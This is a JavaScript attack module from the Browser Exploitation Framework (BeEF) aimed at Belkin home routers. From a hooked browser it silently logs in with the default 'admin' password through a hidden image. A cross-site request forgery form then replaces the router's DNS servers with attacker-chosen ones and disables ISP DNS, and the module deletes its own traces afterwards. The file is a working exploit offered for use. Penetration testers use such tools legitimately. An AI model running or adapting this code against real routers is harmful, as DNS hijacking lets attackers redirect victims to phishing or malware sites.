//
// Copyright (c) 2006-2024Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {

	// config
	var proto   = 'http'
	var rhost   = '<%= @rhost %>'; 
	var dns1    = '<%= @dns1 %>';
	var dns2    = '<%= @dns2 %>';
	var timeout = 15;

	// validate primary DNS server IP address
	if (!beef.net.is_valid_ip(dns1)) {
		beef.debug('Invalid Primary DNS server IP address was provided');
		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
		return;
	}
	var parts = dns1.split('.');
	var dns1_1 = parts[0];
	var dns1_2 = parts[1];
	var dns1_3 = parts[2];
	var dns1_4 = parts[3];

	// validate secondary DNS server IP address
	if (!beef.net.is_valid_ip(dns2)) {
		beef.debug('Invalid Secondary DNS server IP address was provided');
		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
		return;
	}
	var parts = dns2.split('.');
	var dns2_1 = parts[0];
	var dns2_2 = parts[1];
	var dns2_3 = parts[2];
	var dns2_4 = parts[3];

	// attempt auth with default password (admin)
	// incorrect login attempts do not log out an authenticated session
	var img = new Image();
	img.setAttribute("style", "visibility:hidden");
	img.setAttribute("width", "0");
	img.setAttribute("height","0");
	img.id = 'belkin_auth_<%= @command_id %>';
	img.src = proto + '://' + rhost + "/cgi-bin/login.exe?pws=admin";
	document.body.appendChild(img);

	// change DNS
	var belkin_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(proto + '://' + rhost + '/cgi-bin/setup_dns.exe', "POST", "application/x-www-form-urlencoded", [
		{'type':'hidden', 'name':'dns1_1',   'value':dns1_1},
		{'type':'hidden', 'name':'dns1_2',   'value':dns1_2},
		{'type':'hidden', 'name':'dns1_3',   'value':dns1_3},
		{'type':'hidden', 'name':'dns1_4',   'value':dns1_4},
		{'type':'hidden', 'name':'dns2_1',   'value':dns2_1},
		{'type':'hidden', 'name':'dns2_2',   'value':dns2_2},
		{'type':'hidden', 'name':'dns2_3',   'value':dns2_3},
		{'type':'hidden', 'name':'dns2_4',   'value':dns2_4},
		{'type':'hidden', 'name':'dns2_1_t', 'value':dns2_1},
		{'type':'hidden', 'name':'dns2_2_t', 'value':dns2_2},
		{'type':'hidden', 'name':'dns2_3_t', 'value':dns2_3},
		{'type':'hidden', 'name':'dns2_4_t', 'value':dns2_4},
		{'type':'hidden', 'name':'auto_from_isp', 'value':'0'} // disable dns from ISP
	]);

	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

	// clean up
	cleanup = function() {
		document.body.removeChild(belkin_iframe_<%= @command_id %>);
		document.body.removeChild(belkin_auth_<%= @command_id %>);
	}
	setTimeout("cleanup()", timeout*1000);

});

